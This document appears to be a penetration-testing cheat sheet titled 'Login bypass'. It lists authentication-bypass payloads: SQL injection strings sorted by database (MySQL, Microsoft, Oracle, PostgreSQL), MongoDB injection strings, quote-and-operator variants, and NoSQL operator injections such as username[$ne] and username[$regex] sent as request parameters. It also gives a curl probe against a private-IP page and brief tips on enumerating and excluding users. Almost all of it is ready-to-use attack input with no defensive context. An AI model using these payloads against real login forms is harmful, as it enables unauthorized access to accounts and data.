Login bypass
#With curl
#Use -I flag
curl -I "http://192.168.101.105/item/viewItem.php?id=5"
#Try:
whatever' or '1'='1
' or '1'='1
-----------------------------------
#Microsoft, Oracle, PostgreSQL
admin'--
admin' or 1=1--
admin' or '1'='1'--
admin}" or 1=1--
----------------------------------
#MongoDB specific Injection
' || 1==1 %00
admin' || 1==1//
admin' || 1==1%00
admin' || '1==1
admin' || '1'=='1
----------------------------------
MySQL
admin'-- -
admin'#
admin' or 1=1#
admin' or 1=1-- -
admin' or '1'='1'-- -
admin' or '1'='1'#
admin}" or 1=1-- -
----------------------------------
#Extra stuff
-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
----------------------------
Operators
# $ne: Not equal
username[$ne]=xyz&password[$ne]=xyz
# $regex: Regular expressions
username[$regex]=.*&password[$regex]=.*
username[$regex]=^xyz&password[$regex]=^xyz
username[$regex]=^a.*$&password[$ne]=xyz
username[$regex]=.{6}&password[$ne]=xyz
username[$regex]=^.{1}&password[$regex]=^.{1} # Length of values
# $exists: Exists in the database
username[$exists]=true&password[$exists]=true
# $nin: Not include
username[$nin][admin]=admin&password[$ne]=xyz
# If we found the "admin" exists, we can exclude "admin" by specifying $nin operator.
username[$nin][]=admin&password[$ne]=xyz
# If more users are found, we can exclude the user.
username[$nin][]=admin&username[$nin][]=john&password[$ne]=xyz
# $gt: Greater than
username[$gt]=s&password[$gt]=s
# $lt: Lower than
username[$lt]=s&password[$lt]=s
# Combinations
username[$ne]=xyz&password[$regex]=.*
username[$exists]=true&password[$ne]=xyz
username[$ne]=xyz&password[$exists]=true
username[$regex]=.*&password[$ne]=xyz
username[$ne]=xyz&password[$regex]=.*
username[$regex]=.{6}&password[$ne]=xyz
Last updated